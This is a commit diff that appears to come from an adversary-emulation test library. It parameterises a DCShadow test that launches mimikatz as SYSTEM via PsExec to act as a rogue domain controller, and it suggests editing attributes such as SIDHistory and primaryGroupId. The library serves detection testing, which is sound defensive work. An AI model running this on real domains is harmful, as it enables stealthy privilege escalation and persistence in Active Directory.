Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
parent
18087c9ad8
commit
9c1f9f733c
@@ -38149,11 +38149,20 @@ defense-evasion:
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
user:
|
||||
description: Targeted user (for machine account do not forget to add final
|
||||
object:
|
||||
description: Targeted object (for machine account do not forget to add final
|
||||
'$')
|
||||
type: string
|
||||
default: CLIENT1$
|
||||
default: bruce.wayne
|
||||
attribute:
|
||||
description: 'Object attribute to edit, interesting ones: badpwdcount, primaryGroupId,
|
||||
SIDHistory...'
|
||||
type: string
|
||||
default: badpwdcount
|
||||
value:
|
||||
description: Value to assign to object attribute
|
||||
type: string
|
||||
default: 9999
|
||||
mimikatz_path:
|
||||
description: Mimikatz windows executable
|
||||
type: path
|
||||
@@ -38196,7 +38205,7 @@ defense-evasion:
|
||||
# starting fake DC server, as SYSTEM (required)
|
||||
$dc_output_file = "$env:TEMP\art-T1207-mimikatz-DC.log"
|
||||
Remove-Item $dc_output_file -ErrorAction Ignore
|
||||
$mimikatzParam ="`"log $dc_output_file`" `"lsadump::dcshadow /object:#{user} /attribute:badpwdcount /value:9999`" `"exit`""
|
||||
$mimikatzParam ="`"log $dc_output_file`" `"lsadump::dcshadow /object:#{object} /attribute:#{attribute} /value:#{value}`" `"exit`""
|
||||
$dc = Start-Process -FilePath cmd.exe -Verb Runas -ArgumentList "/c #{psexec_path} /accepteula -d -s #{mimikatz_path} $mimikatzParam"
|
||||
|
||||
# wait for fake DC server to be ready...
|
||||
@@ -38210,6 +38219,7 @@ defense-evasion:
|
||||
|
||||
Write-Host "`nOutput from fake DC server:"
|
||||
Get-Content $dc_output_file
|
||||
Start-Sleep 1 # wait a little until the file is not locked anymore so we can actually delete it
|
||||
Remove-Item $dc_output_file -ErrorAction Ignore
|
||||
|
||||
Write-Host "End of DCShadow"
|
||||
|
||||
@@ -33,7 +33,9 @@ The easiest is to run elevated and as a Domain Admin user.
|
||||
#### Inputs:
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| user | Targeted user (for machine account do not forget to add final '$') | string | CLIENT1$|
|
||||
| object | Targeted object (for machine account do not forget to add final '$') | string | bruce.wayne|
|
||||
| attribute | Object attribute to edit, interesting ones: badpwdcount, primaryGroupId, SIDHistory... | string | badpwdcount|
|
||||
| value | Value to assign to object attribute | string | 9999|
|
||||
| mimikatz_path | Mimikatz windows executable | path | $env:TEMP\mimikatz\x64\mimikatz.exe|
|
||||
| psexec_path | Path to PsExec | string | C:\PSTools\PsExec.exe|
|
||||
|
||||
@@ -45,7 +47,7 @@ The easiest is to run elevated and as a Domain Admin user.
|
||||
# starting fake DC server, as SYSTEM (required)
|
||||
$dc_output_file = "$env:TEMP\art-T1207-mimikatz-DC.log"
|
||||
Remove-Item $dc_output_file -ErrorAction Ignore
|
||||
$mimikatzParam ="`"log $dc_output_file`" `"lsadump::dcshadow /object:#{user} /attribute:badpwdcount /value:9999`" `"exit`""
|
||||
$mimikatzParam ="`"log $dc_output_file`" `"lsadump::dcshadow /object:#{object} /attribute:#{attribute} /value:#{value}`" `"exit`""
|
||||
$dc = Start-Process -FilePath cmd.exe -Verb Runas -ArgumentList "/c #{psexec_path} /accepteula -d -s #{mimikatz_path} $mimikatzParam"
|
||||
|
||||
# wait for fake DC server to be ready...
|
||||
@@ -59,6 +61,7 @@ Wait-Process $dc
|
||||
|
||||
Write-Host "`nOutput from fake DC server:"
|
||||
Get-Content $dc_output_file
|
||||
Start-Sleep 1 # wait a little until the file is not locked anymore so we can actually delete it
|
||||
Remove-Item $dc_output_file -ErrorAction Ignore
|
||||
|
||||
Write-Host "End of DCShadow"
|
||||
|
||||